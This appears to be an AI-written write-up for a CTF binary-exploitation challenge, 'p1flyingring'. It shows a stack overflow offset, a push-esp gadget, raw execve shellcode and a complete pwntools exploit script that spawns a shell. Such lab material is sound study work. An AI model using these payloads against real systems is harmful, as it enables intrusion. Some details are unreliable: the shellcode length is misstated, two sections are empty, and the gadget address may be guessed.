
Here’s a write-up for the challenge, assuming it’s a CTF/pwn challenge (common on platforms like pwnable.tw or similar). If you meant a different context (e.g., reversing, web), let me know.

p1flyingring – Write-up

1. Challenge Overview

p1flyingring is a binary exploitation challenge. The name hints at a “flying ring” (possibly a pun on Feng Ring or buffer overflow). The binary is a 32-bit ELF with minimal protections.

2. Checking security:

3. Finding the offset

    $ cyclic 100
    $ run < pattern

Offset = 0x44 (68 bytes).

4. Finding a gadget and shellcode

    objdump -d p1flyingring | grep "jmp esp"

→ none in binary. Check libc or use push esp; ret:

    $ ROPgadget --binary p1flyingring | grep "push esp"
    0x0804858a : push esp ; ret

Address: 0x0804858a.

32-bit execve shellcode (25 bytes), generated with pwntools:

    shellcode = asm(shellcraft.i386.sh())

or hard-coded:

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Payload layout:

    [ padding 0x44 ] [ push_esp_ret_addr ] [ nop sled + shellcode ]

5. Exploit script (Python)

    #!/usr/bin/env python3
    from pwn import *

    context(arch='i386', os='linux')

    # Local target; swap in the remote line for the live service.
    p = process('./p1flyingring')
    # p = remote('target', port)   # 'target' and port are placeholders

    offset = 0x44                   # bytes until the saved return address
    push_esp_ret = 0x0804858a       # push esp ; ret gadget found above

    shellcode = asm(shellcraft.i386.sh())
    payload = b'A' * offset
    payload += p32(push_esp_ret)    # return into push esp ; ret -> lands on the sled
    payload += b'\x90' * 16         # nop sled
    payload += shellcode

    p.send(payload)
    p.interactive()

Run → get shell.

After exploitation:
